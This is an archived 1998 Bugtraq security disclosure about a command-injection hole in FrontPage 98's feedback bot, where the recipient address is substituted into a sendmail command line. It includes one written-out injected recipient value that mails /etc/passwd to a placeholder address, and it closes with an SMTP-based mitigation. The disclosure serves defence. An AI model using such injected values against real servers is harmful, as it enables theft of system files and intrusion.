Re: Followup to FP98 and other Frontpage bugs

[maex-lists-bugtraq () SPACE NET (Markus Stumpf)]

On Mon, Oct 12, 1998 at 11:22:38AM -0700, pedward () WEBCOM COM wrote:
> So, here is the status of Frontpage and it's (in)security.

Don't know whether this has already been reported.
I've noticed another weakness which is still present at least in
FP98 with the version id:
    FPVersion="3.0.2.1330"

When installing a server for Frontpage it creates a file (usually)
   /usr/local/frontpage/www.example.com:80.cnf

In order to get the feedback bot working for sending feedback via eMail
you can define within this file
    SendmailCommand:/usr/sbin/sendmail %r
The "%r" above is substituted with the recipients email address(es).

With this setting you are vulnerable, as creating a feedback page
with a recipient address of e.g.
        `/usr/bin/Mail -s 'password' nobody () example com < /etc/passwd`
will execute the command
    /usr/sbin/sendmail `/usr/bin/Mail -s 'password' nobody () example com < /etc/passwd`
and send the password file to nobody () example com.

To avoid this tell Frontpage to use the SMTP protocol to send emails
by using
    SMTPHost:mail.example.com
and you may probably also use
    MailSender:webmaster () example com


        \Maex

--
SpaceNet GmbH          |   http://www.Space.Net/   | In a world whithout
Research & Development | mailto:research () Space Net |   walls and fences,
Frankfurter Ring 193a  |  Tel: +49 (89) 32356-0    | who needs
D-80807 Muenchen       |  Fax: +49 (89) 32356-299  |   Windows and Gates?